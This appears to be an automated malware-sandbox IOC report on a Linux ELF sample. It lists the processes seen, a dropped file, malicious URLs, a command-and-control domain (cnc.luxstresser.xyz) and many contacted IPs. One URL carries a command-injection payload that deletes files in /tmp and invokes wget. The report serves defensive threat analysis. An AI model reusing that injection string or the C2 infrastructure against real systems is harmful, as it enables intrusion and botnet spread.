IOC Report
file1

loading gif

Files

File Path
Type
Category
Malicious
file1
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/var/cache/motd-news
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/usr/bin/dash
n/a
/usr/bin/cat
cat /tmp/tmp.bhkKqn6VLL
/usr/bin/dash
n/a
/usr/bin/head
head -n 10
/usr/bin/dash
n/a
/usr/bin/tr
tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash
n/a
/usr/bin/cut
cut -c -80
/usr/bin/dash
n/a
/usr/bin/cat
cat /tmp/tmp.bhkKqn6VLL
/usr/bin/dash
n/a
/usr/bin/head
head -n 10
/usr/bin/dash
n/a
/usr/bin/tr
tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash
n/a
/usr/bin/cut
cut -c -80
/usr/bin/dash
n/a
/usr/bin/rm
rm -f /tmp/tmp.bhkKqn6VLL /tmp/tmp.RuRqJkNDuA /tmp/tmp.FX40reyTu0
/tmp/file1
/tmp/file1
/tmp/file1
n/a
/tmp/file1
n/a
/tmp/file1
n/a
/tmp/file1
n/a
/tmp/file1
n/a
/tmp/file1
n/a
/usr/bin/xfce4-panel
n/a
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
/usr/bin/xfce4-panel
n/a
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
/usr/bin/xfce4-panel
n/a
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
/usr/bin/xfce4-panel
n/a
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
n/a
/usr/sbin/xfpm-power-backlight-helper
/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
/usr/bin/xfce4-panel
n/a
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
/usr/bin/xfce4-panel
n/a
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
/usr/bin/dbus-daemon
n/a
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
There are 31 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+
97.65.142.24
 malicious
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://ubuntu.com/blog/microk8s-memory-optimisation
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown

Domains

Name
IP
Malicious
cnc.luxstresser.xyz
unknown
 malicious

IPs

IP
Domain
Country
Malicious
151.226.166.50
unknown
United Kingdom
14.228.128.141
unknown
Viet Nam
197.59.229.32
unknown
Egypt
41.35.35.134
unknown
Egypt
210.165.251.143
unknown
Japan
134.120.216.174
unknown
United States
168.222.253.185
unknown
United States
156.92.15.66
unknown
United States
197.136.25.2
unknown
Kenya
41.99.68.177
unknown
Algeria
74.64.23.25
unknown
United States
86.240.156.164
unknown
France
41.94.163.82
unknown
Mozambique
41.106.43.128
unknown
Algeria
205.175.95.64
unknown
United States
197.217.236.118
unknown
Angola
161.164.218.240
unknown
United States
130.205.38.203
unknown
United States
178.218.134.59
unknown
Romania
208.67.236.151
unknown
United States
160.100.160.201
unknown
United Kingdom
156.254.119.6
unknown
Seychelles
73.152.94.189
unknown
United States
162.115.86.71
unknown
United States
175.108.35.207
unknown
Japan
217.22.110.121
unknown
Spain
41.68.48.244
unknown
Egypt
24.33.86.89
unknown
United States
161.46.177.71
unknown
United States
60.19.228.233
unknown
China
170.218.220.32
unknown
United States
197.191.38.219
unknown
Ghana
133.0.206.81
unknown
Japan
41.145.207.246
unknown
South Africa
188.173.82.208
unknown
Romania
197.214.155.167
unknown
Congo
197.73.132.136
unknown
South Africa
205.245.72.43
unknown
United States
197.143.201.73
unknown
Algeria
27.21.41.20
unknown
China
19.112.97.205
unknown
United States
87.222.194.121
unknown
Spain
217.156.198.183
unknown
United Kingdom
206.114.194.64
unknown
United States
190.74.207.8
unknown
Venezuela
179.101.227.73
unknown
Brazil
34.0.71.110
unknown
United States
45.141.18.24
unknown
Netherlands
156.241.11.81
unknown
Seychelles
162.237.115.197
unknown
United States
197.234.167.159
unknown
South Africa
168.11.235.136
unknown
United States
60.53.67.215
unknown
Malaysia
47.228.85.29
unknown
United States
66.81.23.243
unknown
United States
41.77.181.142
unknown
Algeria
133.9.169.38
unknown
Japan
73.105.58.29
unknown
United States
152.116.148.10
unknown
United States
147.48.77.176
unknown
United States
195.164.130.163
unknown
Poland
27.236.188.140
unknown
Korea Republic of
41.25.211.135
unknown
South Africa
109.145.152.71
unknown
United Kingdom
107.128.43.13
unknown
United States
191.92.238.169
unknown
Colombia
8.129.155.155
unknown
Singapore
204.85.103.204
unknown
United States
199.130.247.154
unknown
United States
156.192.115.130
unknown
Egypt
76.12.107.141
unknown
United States
49.100.27.192
unknown
Japan
152.83.207.143
unknown
Australia
153.246.205.122
unknown
Japan
85.211.188.113
unknown
United Kingdom
160.120.31.172
unknown
Cote D'ivoire
95.23.230.97
unknown
Spain
142.193.218.70
unknown
Canada
41.138.141.89
unknown
Mauritania
41.35.57.70
unknown
Egypt
13.65.160.209
unknown
United States
146.211.32.105
unknown
Finland
197.12.31.210
unknown
Tunisia
197.231.80.95
unknown
Gabon
105.1.204.215
unknown
South Africa
156.16.3.222
unknown
unknown
47.152.237.217
unknown
United States
197.104.77.51
unknown
South Africa
8.159.102.86
unknown
Singapore
197.217.236.147
unknown
Angola
197.207.206.191
unknown
Algeria
156.3.205.253
unknown
United States
39.123.64.75
unknown
Korea Republic of
197.235.33.63
unknown
Mozambique
62.186.69.39
unknown
European Union
197.251.50.178
unknown
Sudan
41.69.166.172
unknown
Egypt
169.108.126.83
unknown
United States
82.51.56.243
unknown
Italy
54.50.233.185
unknown
United States
There are 90 hidden IPs, click here to show them.